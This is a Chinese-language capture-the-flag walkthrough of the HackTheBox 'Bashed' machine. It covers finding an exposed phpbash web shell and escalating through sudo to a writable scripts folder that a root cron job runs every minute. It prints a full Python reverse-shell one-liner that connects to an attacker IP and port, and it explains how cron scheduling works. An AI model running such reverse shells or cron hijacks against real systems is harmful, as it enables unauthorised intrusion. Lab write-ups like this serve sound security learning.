IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> HTB-Bashed -> 正文阅读

[PHP知识库]HTB-Bashed

在这里插入图片描述

信息收集

在这里插入图片描述在这里插入图片描述
phpbash 顾名思义应该是能在php上远程执行bash
在这里插入图片描述
扫描目录后
在这里插入图片描述

尝试阶段

根据收集到的信息能在/dev找到描述的phpbash
在这里插入图片描述
在这里插入图片描述
能在/home/arrexel找到user.txt
在这里插入图片描述

提权阶段

操作不怎么方便还是反弹到本地好操作点。

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.42",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

先看看当前用户能用sudo执行些什么命令
在这里插入图片描述
这个scriptmanager有什么用呢,可以在根目录找到一个scripts文件,看上去有东西。
在这里插入图片描述

因为有一个scriptmanager可以使用,前面可以知道/home里面有一个scriptmanager用户,所以可以考虑用scriptmannager创建一个bash。

在这里插入图片描述
现在能进去scripts目录看看了。
在这里插入图片描述
有一个py和txt文件,但是txt文件的时间是上一分钟修改过,再次等了一分钟后发现修改时间又变了。
在这里插入图片描述
因为test.txt是root用户的文件,scriptmanager无权干涉,但是它却在以一分钟为间隔在修改,难道是test.py在修改么。
在这里插入图片描述
看来应该是test.py在修改test.txt,但是test.py是scriptmanager的产物,应该没权修改root文件。可能是root用户有一个周期任务,周期来执行test.py,也有可能是定时执行scripts这个文件里面的所有脚本。

在这里插入图片描述
应该是周期执行scripts里面所有的脚本,这就好办了,直接上传个反弹shell,然后等一分钟以root权限执行。

有了root权限后,去看看是不是scripts会按周期执行目录内的脚本。
在这里插入图片描述
能看到五个星号,他们有什么含义呢

项目(从左往右)含义
第一个星号分钟
第二个星号小时
第三个星号
第四个星号
第五个星号星期

此处遇到的星号是特殊符号之一表示任意时间,五个星号就是任意的分钟小时天星期月份,就是每分钟一次,一次什么内容呢。先cd到scripts目录然后执行里面的所有.py结束的python程序。

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章           查看所有文章
加:2022-07-20 18:34:06  更:2022-07-20 18:34:10 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年4日历 -2024/4/23 17:15:13-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码